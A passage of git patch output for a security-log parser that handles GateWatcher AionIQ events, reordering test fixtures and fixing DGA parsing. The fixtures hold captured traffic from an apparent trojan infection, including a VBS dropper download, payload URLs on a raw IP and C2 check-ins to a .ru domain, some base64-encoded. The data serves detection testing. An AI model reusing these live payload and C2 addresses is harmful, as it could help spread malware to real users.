/a35new/aw7.tiff HTTP/1.1\\r\\nHost: 65.181.125.193\\r\\n\\r\\nGET /bsb/infects/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Windows%207%20Home%20Premium%20%20%20%20=%20%20%20%20%20%20%20N/A HTTP/1.1\\r\\nHost: www.devyatinskiy.ru\\r\\nConnection: Keep-Alive\\r\\n\\r\\nGET /bsb/debugnosso/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Iniciou%20o%20executar%20%20http://65.181.125.193/a35new/w7.zip%7Chttp://65.181.125.193/a35new/w7.zip%7C32%7Chttp://65.181.125.193/a35new/dll.dll HTTP/1.1\\r\\nHost: www.devyatinskiy.ru\\r\\n\\r\\n\",\"alert\":{\"signature\":\"ETPRO TROJAN MSIL/Bazidow.A HTTP C2\",\"category\":\"A Network Trojan was detected\",\"gid\":1,\"signature_id\":2828821,\"rev\":3,\"severity\":1,\"metadata\":{\"affected_product\":[\"Windows_XP_Vista_7_8_10_Server_32_64_Bit\"],\"performance_impact\":[\"Moderate\"],\"deployment\":[\"Perimeter\"],\"created_at\":[\"2017_12_07\"],\"updated_at\":[\"2022_05_03\"],\"former_category\":[\"MALWARE\"],\"attack_target\":[\"Client_Endpoint\"],\"signature_severity\":[\"Major\"]},\"action\":\"allowed\"}}"
+    }
   },
   "expected": {
     "message": "{\"event_type\":\"alert\",\"http\":{\"url\":\"/bsb/debugnosso/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Iniciou%20o%20executar%20%20http://65.181.125.193/a35new/w7.zip%7Chttp://65.181.125.193/a35new/w7.zip%7C32%7Chttp://65.181.125.193/a35new/dll.dll\",\"protocol\":\"HTTP/1.1\",\"hostname\":\"www.devyatinskiy.ru\",\"length\":0,\"http_method\":\"GET\"},\"timestamp_detected\":\"2023-03-22T10:25:55.690Z\",\"uuid\":\"fd5ba8ea-e263-426d-b4b2-a16521ae09b1\",\"packet_info\":{\"linktype\":1},\"severity\":1,\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"host\":\"gcap-xxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":1408237495862400,\"dest_port\":16122,\"@timestamp\":\"2023-03-22T10:44:08.001Z\",\"timestamp_analyzed\":\"2023-03-22T10:44:08.001Z\",\"gcap\":\"gcap-xxxxxxx.domain.local\",\"type\":\"suricata\",\"src_port\":8550,\"metadata\":{\"flowbits\":[\"min.gethttp\",\"ETPROtxtminhead\",\"http.dottedquadhost.dll\"]},\"community_id\":\"1:hEBuGl9msx7YJtg3Tb/+Gf+a1VI=\",\"app_proto\":\"http\",\"packet\":\"kOK6pqSQkOK6pqSRCABFAAC7Uz1AAEAGPT4py4AkHxzgtiFmPvokcIbSnp074oAYAGsSTgAAAQEICmgi0xNoItMTR0VUIC9ic2IvZGVidWdub3Nzby9pbmRleC5waHA/Tj1HTy1HTy1HQURHRVQtUEMtaW5zcGVjdG9yLWdhZGdldCUyMD0lMjAlMjAlMjAlMjBJbmljaWFyJTdCNjklN0QgSFRUUC8xLjENCkhvc3Q6IHd3dy5kZXZ5YXRpbnNraXkucnUNCg0K\",\"proto\":\"TCP\",\"stream\":1,\"flow\":{\"bytes_toclient\":90364,\"bytes_toserver\":3084,\"pkts_toserver\":19,\"pkts_toclient\":66,\"start\":\"2023-03-22T10:25:55.345216+0000\"},\"tx_id\":5,\"ether\":{\"dest_mac\":\"90:e2:ba:a6:a4:90\",\"src_mac\":\"90:e2:ba:a6:a4:91\"},\"payload\":\"R0VUIC9kb3dubG9hZC9RanRHRGx0bWNlLzE2MDgyMDE2dmVjTzdPa0wzeUxQSUNsZW96aWJLRS52YnM/ZHNpZD1ndjVucTMuNDAwYjg2YzcxOTZmOWU4Y2NkZTM1MzcwZWIwYTU0Yjkmc2Jzcj0yZjViMmRmMGFlMGE4Yzc1NTFjN2RmMGJjNDZhOWQ3OTk4MCZsZ2ZwPTMwMDAgSFRUUC8xLjENCkFjY2VwdDogdGV4dC9odG1sLCBhcHBsaWNhdGlvbi94aHRtbCt4bWwsICovKg0KQWNjZXB0LUxhbmd1YWdlOiBlbi1VUw0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBXT1c2NDsgVHJpZGVudC83LjA7IHJ2OjExLjApIGxpa2UgR2Vja28NCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KSG9zdDogZGM1MjQuNHNoYXJlZC5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkNvb2tpZTogZGF5MWhvc3Q9aA0KDQpHRVQgL3dlYi9jZG4vcG9wdWxhci9kb3dubG9hZC9RanRHRGx0bWNlP2NvbnREaXNwPWF0dGFjaG1lbnQlM0IrZmlsZW5hbWUlM0QlMjIxNjA4MjAxNnZlY083T2tMM3lMUElDbGVvemliS0VIYTg2MUh6aDlHRi52YnMlMjIlM0IrZmlsZW5hbWUqJTNEdXRmLTglMjclMjcxNjA4MjAxNnZlY083T2tMM3lMUElDbGVvemliS0VIYTg2MUh6aDlHRi52YnMmY29udFR5cGU9QVBQTElDQVRJT04lMkZPQ1RFVC1TVFJFQU0mY2RuaD03YTc0NTUzYTA1N2VhNTVmYzU2OGI4MGU2MGNkN2ZhMiZkM2M9ZmRzUWp0R0RsdG1jZSUzRElOSVRJQUxJWkVEJTNCK2RvbWFpbiUzRC40c2hhcmVkLmNvbSUzQitleHBpcmVzJTNEV2VkJTJDKzE3LUF1Zy0yMDE2KzAxJTNBMzYlM0E0NCtHTVQlM0IrcGF0aCUzRCUyRiBIVFRQLzEuMQ0KQWNjZXB0OiB0ZXh0L2h0bWwsIGFwcGxpY2F0aW9uL3hodG1sK3htbCwgKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjE7IFdPVzY0OyBUcmlkZW50LzcuMDsgcnY6MTEuMCkgbGlrZSBHZWNrbw0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpDb29raWU6IGRheTFob3N0PWgNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IGNkbmZpbGVzLjRzaGFyZWQuY29tDQoNCkdFVCAvYTM1bmV3L3c3LnR4dCBIVFRQLzEuMQ0KSG9zdDogNjUuMTgxLjEyNS4xOTMNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0KR0VUIC9hMzVuZXcvYXc3LnRpZmYgSFRUUC8xLjENCkhvc3Q6IDY1LjE4MS4xMjUuMTkzDQoNCkdFVCAvYnNiL2luZmVjdHMvaW5kZXgucGhwP049R08tR08tR0FER0VULVBDLWluc3BlY3Rvci1nYWRnZXQlMjA9JTIwJTIwJTIwJTIwV2luZG93cyUyMDclMjBIb21lJTIwUHJlbWl1bSUyMCUyMCUyMCUyMD0lMjAlMjAlMjAlMjAlMjAlMjAlMjBOL0EgSFRUUC8xLjENCkhvc3Q6IHd3dy5kZXZ5YXRpbnNraXkucnUNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0KR0VUIC9ic2IvZGVidWdub3Nzby9pbmRleC5waHA/Tj1HTy1HTy1HQURHRVQtUEMtaW5zcGVjdG9yLWdhZGdldCUyMD0lMjAlMjAlMjAlMjBJbmljaW91JTIwbyUyMGV4ZWN1dGFyJTIwJTIwaHR0cDovLzY1LjE4MS4xMjUuMTkzL2EzNW5ldy93Ny56aXAlN0NodHRwOi8vNjUuMTgxLjEyNS4xOTMvYTM1bmV3L3c3LnppcCU3QzMyJTdDaHR0cDovLzY1LjE4MS4xMjUuMTkzL2EzNW5ldy9kbGwuZGxsIEhUVFAvMS4xDQpIb3N0OiB3d3cuZGV2eWF0aW5za2l5LnJ1DQoNCg==\",\"@version\":\"1\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"payload_printable\":\"GET /download/QjtGDltmce/16082016vecO7OkL3yLPICleozibKE.vbs?dsid=gv5nq3.400b86c7196f9e8ccde35370eb0a54b9&sbsr=2f5b2df0ae0a8c7551c7df0bc46a9d79980&lgfp=3000 HTTP/1.1\\r\\nAccept: text/html, application/xhtml+xml, */*\\r\\nAccept-Language: en-US\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\\r\\nAccept-Encoding: gzip, deflate\\r\\nHost: dc524.4shared.com\\r\\nConnection: Keep-Alive\\r\\nCookie: day1host=h\\r\\n\\r\\nGET /web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F HTTP/1.1\\r\\nAccept: text/html, application/xhtml+xml, */*\\r\\nAccept-Language: en-US\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\\r\\nAccept-Encoding: gzip, deflate\\r\\nCookie: day1host=h\\r\\nConnection: Keep-Alive\\r\\nHost: cdnfiles.4shared.com\\r\\n\\r\\nGET /a35new/w7.txt HTTP/1.1\\r\\nHost: 65.181.125.193\\r\\nConnection: Keep-Alive\\r\\n\\r\\nGET /a35new/aw7.tiff HTTP/1.1\\r\\nHost: 65.181.125.193\\r\\n\\r\\nGET /bsb/infects/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Windows%207%20Home%20Premium%20%20%20%20=%20%20%20%20%20%20%20N/A HTTP/1.1\\r\\nHost: www.devyatinskiy.ru\\r\\nConnection: Keep-Alive\\r\\n\\r\\nGET /bsb/debugnosso/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Iniciou%20o%20executar%20%20http://65.181.125.193/a35new/w7.zip%7Chttp://65.181.125.193/a35new/w7.zip%7C32%7Chttp://65.181.125.193/a35new/dll.dll HTTP/1.1\\r\\nHost: www.devyatinskiy.ru\\r\\n\\r\\n\",\"alert\":{\"signature\":\"ETPRO TROJAN MSIL/Bazidow.A HTTP C2\",\"category\":\"A Network Trojan was detected\",\"gid\":1,\"signature_id\":2828821,\"rev\":3,\"severity\":1,\"metadata\":{\"affected_product\":[\"Windows_XP_Vista_7_8_10_Server_32_64_Bit\"],\"performance_impact\":[\"Moderate\"],\"deployment\":[\"Perimeter\"],\"created_at\":[\"2017_12_07\"],\"updated_at\":[\"2022_05_03\"],\"former_category\":[\"MALWARE\"],\"attack_target\":[\"Client_Endpoint\"],\"signature_severity\":[\"Major\"]},\"action\":\"allowed\"}}",
diff --git a/GateWatcher/aioniq/tests/sigflow-file.json b/GateWatcher/aioniq/tests/sigflow-file.json
index ed0cfe547..2e1580dce 100644
--- a/GateWatcher/aioniq/tests/sigflow-file.json
+++ b/GateWatcher/aioniq/tests/sigflow-file.json
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{\"event_type\":\"fileinfo\",\"proto\":\"TCP\",\"http\":{\"protocol\":\"HTTP/1.1\",\"url\":\"/web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F\",\"hostname\":\"cdnfiles.4shared.com\",\"status\":200,\"length\":1088,\"http_content_type\":\"APPLICATION/OCTET-STREAM\",\"http_user_agent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\",\"http_method\":\"GET\"},\"timestamp_detected\":\"2023-03-22T10:25:55.469Z\",\"uuid\":\"24231245-276c-4509-9437-016b82f88c7c\",\"type\":\"suricata\",\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":1408237495862400,\"@timestamp\":\"2023-03-22T10:44:07.998Z\",\"timestamp_analyzed\":\"2023-03-22T10:44:07.998Z\",\"@version\":\"1\",\"gcap\":\"gcap-xxxxxxxxxx.domain.local\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"fileinfo\":{\"size\":1088,\"filename\":\"16082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs\",\"state\":\"CLOSED\",\"sha256\":\"f31faae778ecfee8e27041309444468a37ad7681d42d7972faa92fe2056721df\",\"magic\":\"Little-endian UTF-16 Unicode text, with CRLF line terminators\",\"sid\":[],\"stored\":false,\"tx_id\":1,\"gaps\":false,\"md5\":\"d526c8e4ad7ab6d80baeb839976b7c80\"},\"dest_port\":8550,\"src_port\":16122,\"app_proto\":\"http\"}",
     "sekoiaio": {
       "intake": {
         "dialect": "Gatewatcher AionIQ",
         "dialect_uuid": "0825709a-5f76-441e-9dfb-2b5ea6ce551c"
       }
-    },
-    "message": "{\"event_type\":\"fileinfo\",\"proto\":\"TCP\",\"http\":{\"protocol\":\"HTTP/1.1\",\"url\":\"/web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F\",\"hostname\":\"cdnfiles.4shared.com\",\"status\":200,\"length\":1088,\"http_content_type\":\"APPLICATION/OCTET-STREAM\",\"http_user_agent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\",\"http_method\":\"GET\"},\"timestamp_detected\":\"2023-03-22T10:25:55.469Z\",\"uuid\":\"24231245-276c-4509-9437-016b82f88c7c\",\"type\":\"suricata\",\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":1408237495862400,\"@timestamp\":\"2023-03-22T10:44:07.998Z\",\"timestamp_analyzed\":\"2023-03-22T10:44:07.998Z\",\"@version\":\"1\",\"gcap\":\"gcap-xxxxxxxxxx.domain.local\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"fileinfo\":{\"size\":1088,\"filename\":\"16082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs\",\"state\":\"CLOSED\",\"sha256\":\"f31faae778ecfee8e27041309444468a37ad7681d42d7972faa92fe2056721df\",\"magic\":\"Little-endian UTF-16 Unicode text, with CRLF line terminators\",\"sid\":[],\"stored\":false,\"tx_id\":1,\"gaps\":false,\"md5\":\"d526c8e4ad7ab6d80baeb839976b7c80\"},\"dest_port\":8550,\"src_port\":16122,\"app_proto\":\"http\"}"
+    }
   },
   "expected": {
     "message": "{\"event_type\":\"fileinfo\",\"proto\":\"TCP\",\"http\":{\"protocol\":\"HTTP/1.1\",\"url\":\"/web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F\",\"hostname\":\"cdnfiles.4shared.com\",\"status\":200,\"length\":1088,\"http_content_type\":\"APPLICATION/OCTET-STREAM\",\"http_user_agent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\",\"http_method\":\"GET\"},\"timestamp_detected\":\"2023-03-22T10:25:55.469Z\",\"uuid\":\"24231245-276c-4509-9437-016b82f88c7c\",\"type\":\"suricata\",\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":1408237495862400,\"@timestamp\":\"2023-03-22T10:44:07.998Z\",\"timestamp_analyzed\":\"2023-03-22T10:44:07.998Z\",\"@version\":\"1\",\"gcap\":\"gcap-xxxxxxxxxx.domain.local\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"fileinfo\":{\"size\":1088,\"filename\":\"16082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs\",\"state\":\"CLOSED\",\"sha256\":\"f31faae778ecfee8e27041309444468a37ad7681d42d7972faa92fe2056721df\",\"magic\":\"Little-endian UTF-16 Unicode text, with CRLF line terminators\",\"sid\":[],\"stored\":false,\"tx_id\":1,\"gaps\":false,\"md5\":\"d526c8e4ad7ab6d80baeb839976b7c80\"},\"dest_port\":8550,\"src_port\":16122,\"app_proto\":\"http\"}",
diff --git a/GateWatcher/aioniq/tests/sigflow-meta.json b/GateWatcher/aioniq/tests/sigflow-meta.json
index 9a3ca081a..4da5dbc30 100644
--- a/GateWatcher/aioniq/tests/sigflow-meta.json
+++ b/GateWatcher/aioniq/tests/sigflow-meta.json
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{\"event_type\":\"http\",\"http\":{\"accept_encoding\":\"gzip, deflate\",\"server\":\"524\",\"accept\":\"text/html, application/xhtml+xml, */*\",\"url\":\"/download/QjtGDltmce/16082016vecO7OkL3yLPICleozibKE.vbs?dsid=gv5nq3.400b86c7196f9e8ccde35370eb0a54b9&sbsr=2f5b2df0ae0a8c7551c7df0bc46a9d79980&lgfp=3000\",\"protocol\":\"HTTP/1.1\",\"hostname\":\"dc524.4shared.com\",\"accept_language\":\"en-US\",\"location\":\"http://cdnfiles.4shared.com/web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F\",\"length\":0,\"status\":302,\"http_user_agent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\",\"date\":\"Wed, 17 Aug 2016 01:34:43 GMT\",\"redirect\":\"http://cdnfiles.4shared.com/web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F\",\"content_length\":\"0\",\"cookie\":\"day1host=h\",\"http_method\":\"GET\"},\"timestamp_detected\":\"2023-03-22T10:25:55.377Z\",\"uuid\":\"f8ee6e33-91ef-404f-bad3-a69185416a0d\",\"type\":\"suricata\",\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":1408237495862400,\"@timestamp\":\"2023-03-22T10:44:07.997Z\",\"timestamp_analyzed\":\"2023-03-22T10:44:07.997Z\",\"gcap\":\"gcap-xxxxxxxxx.domain.local\",\"dest_port\":16122,\"src_port\":8550,\"community_id\":\"1:hEBuGl9msx7YJtg3Tb/+Gf+a1VI=\",\"proto\":\"TCP\",\"tx_id\":0,\"ether\":{\"dest_mac\":\"90:e2:ba:a6:a4:90\",\"src_mac\":\"90:e2:ba:a6:a4:91\"},\"@version\":\"1\",\"gcenter\":\"gcenter-xxxxxxxxxx.domain.local\"}",
     "sekoiaio": {
       "intake": {
         "dialect": "Gatewatcher AionIQ",
         "dialect_uuid": "0825709a-5f76-441e-9dfb-2b5ea6ce551c"
       }
-    },
-    "message": "{\"event_type\":\"http\",\"http\":{\"accept_encoding\":\"gzip, deflate\",\"server\":\"524\",\"accept\":\"text/html, application/xhtml+xml, */*\",\"url\":\"/download/QjtGDltmce/16082016vecO7OkL3yLPICleozibKE.vbs?dsid=gv5nq3.400b86c7196f9e8ccde35370eb0a54b9&sbsr=2f5b2df0ae0a8c7551c7df0bc46a9d79980&lgfp=3000\",\"protocol\":\"HTTP/1.1\",\"hostname\":\"dc524.4shared.com\",\"accept_language\":\"en-US\",\"location\":\"http://cdnfiles.4shared.com/web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F\",\"length\":0,\"status\":302,\"http_user_agent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\",\"date\":\"Wed, 17 Aug 2016 01:34:43 GMT\",\"redirect\":\"http://cdnfiles.4shared.com/web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F\",\"content_length\":\"0\",\"cookie\":\"day1host=h\",\"http_method\":\"GET\"},\"timestamp_detected\":\"2023-03-22T10:25:55.377Z\",\"uuid\":\"f8ee6e33-91ef-404f-bad3-a69185416a0d\",\"type\":\"suricata\",\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":1408237495862400,\"@timestamp\":\"2023-03-22T10:44:07.997Z\",\"timestamp_analyzed\":\"2023-03-22T10:44:07.997Z\",\"gcap\":\"gcap-xxxxxxxxx.domain.local\",\"dest_port\":16122,\"src_port\":8550,\"community_id\":\"1:hEBuGl9msx7YJtg3Tb/+Gf+a1VI=\",\"proto\":\"TCP\",\"tx_id\":0,\"ether\":{\"dest_mac\":\"90:e2:ba:a6:a4:90\",\"src_mac\":\"90:e2:ba:a6:a4:91\"},\"@version\":\"1\",\"gcenter\":\"gcenter-xxxxxxxxxx.domain.local\"}"
+    }
   },
   "expected": {
     "message": "{\"event_type\":\"http\",\"http\":{\"accept_encoding\":\"gzip, deflate\",\"server\":\"524\",\"accept\":\"text/html, application/xhtml+xml, */*\",\"url\":\"/download/QjtGDltmce/16082016vecO7OkL3yLPICleozibKE.vbs?dsid=gv5nq3.400b86c7196f9e8ccde35370eb0a54b9&sbsr=2f5b2df0ae0a8c7551c7df0bc46a9d79980&lgfp=3000\",\"protocol\":\"HTTP/1.1\",\"hostname\":\"dc524.4shared.com\",\"accept_language\":\"en-US\",\"location\":\"http://cdnfiles.4shared.com/web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F\",\"length\":0,\"status\":302,\"http_user_agent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\",\"date\":\"Wed, 17 Aug 2016 01:34:43 GMT\",\"redirect\":\"http://cdnfiles.4shared.com/web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F\",\"content_length\":\"0\",\"cookie\":\"day1host=h\",\"http_method\":\"GET\"},\"timestamp_detected\":\"2023-03-22T10:25:55.377Z\",\"uuid\":\"f8ee6e33-91ef-404f-bad3-a69185416a0d\",\"type\":\"suricata\",\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":1408237495862400,\"@timestamp\":\"2023-03-22T10:44:07.997Z\",\"timestamp_analyzed\":\"2023-03-22T10:44:07.997Z\",\"gcap\":\"gcap-xxxxxxxxx.domain.local\",\"dest_port\":16122,\"src_port\":8550,\"community_id\":\"1:hEBuGl9msx7YJtg3Tb/+Gf+a1VI=\",\"proto\":\"TCP\",\"tx_id\":0,\"ether\":{\"dest_mac\":\"90:e2:ba:a6:a4:90\",\"src_mac\":\"90:e2:ba:a6:a4:91\"},\"@version\":\"1\",\"gcenter\":\"gcenter-xxxxxxxxxx.domain.local\"}",

From 44cd3ae8109baa1768e09e3472738d1dbccf9428 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Tue, 17 Sep 2024 11:15:23 +0200
Subject: [PATCH 068/317] fix(GateWatcher): fix parsing of DGA events and add a
 smart-description

---
 GateWatcher/aioniq/_meta/fields.yml              |  5 -----
 GateWatcher/aioniq/_meta/smart-descriptions.json | 12 ++++++++++++
 GateWatcher/aioniq/ingest/parser.yml             |  2 +-
 GateWatcher/aioniq/tests/dga.json                | 11 ++++++++---
 4 files changed, 21 insertions(+), 9 deletions(-)

diff --git a/GateWatcher/aioniq/_meta/fields.yml b/GateWatcher/aioniq/_meta/fields.yml
index 01ffdaf05..e970bfffc 100644
--- a/GateWatcher/aioniq/_meta/fields.yml
+++ b/GateWatcher/aioniq/_meta/fields.yml
@@ -35,11 +35,6 @@ gatewatcher.dnp3:
   name: gatewatcher.dnp3
   type: text
 
-gatewatcher.domain_name:
-  description: This field represents the domain name found in a dga alert
-  name: gatewatcher.domain_name
-  type: text
-
 gatewatcher.email:
   description: This field represents the email field
   name: gatewatcher.email
diff --git a/GateWatcher/aioniq/_meta/smart-descriptions.json b/GateWatcher/aioniq/_meta/smart-descriptions.json
index 6ef36657f..3ec572a81 100644
--- a/GateWatcher/aioniq/_meta/smart-descriptions.json
+++ b/GateWatcher/aioniq/_meta/smart-descriptions.json
@@ -82,5 +82,17 @@
         "value": "powershell"
       }
      ]
+    },
+    {
+    "value": "The domain {destination.domain} was detected as having been generated by a domain generation algorithm",
+    "conditions": [
+      {
+        "field": "gatewatcher.event_type",
+        "value": "dga"
+      },
+      {
+        "field": "destination.domain"
+      }
+     ]
     }
 ]
diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml
index 93f390a79..4db8bf1dc 100644
--- a/GateWatcher/aioniq/ingest/parser.yml
+++ b/GateWatcher/aioniq/ingest/parser.yml
@@ -163,7 +163,7 @@ stages:
     actions:
       - set:
           gatewatcher.type: "{{json_load.message.type}}"
-          gatewatcher.domain_name: "{{json_load.message.domain_name}}"
+          destination.domain: "{{json_load.message.domain_name}}"
           gatewatcher.probability: "{{json_load.message.probability}}"
           gatewatcher.matched_event: "{{json_load.message.matched_event}}"
   retrohunt:
diff --git a/GateWatcher/aioniq/tests/dga.json b/GateWatcher/aioniq/tests/dga.json
index 7516b7e85..b9db082ca 100644
--- a/GateWatcher/aioniq/tests/dga.json
+++ b/GateWatcher/aioniq/tests/dga.json
@@ -19,12 +19,14 @@
     },
     "@timestamp": "2023-03-22T10:46:08.487000Z",
     "destination": {
-      "address": "2.2.2.2",
+      "address": "pgoadcmgqfacj.com",
+      "domain": "pgoadcmgqfacj.com",
       "ip": "2.2.2.2",
-      "port": 53
+      "port": 53,
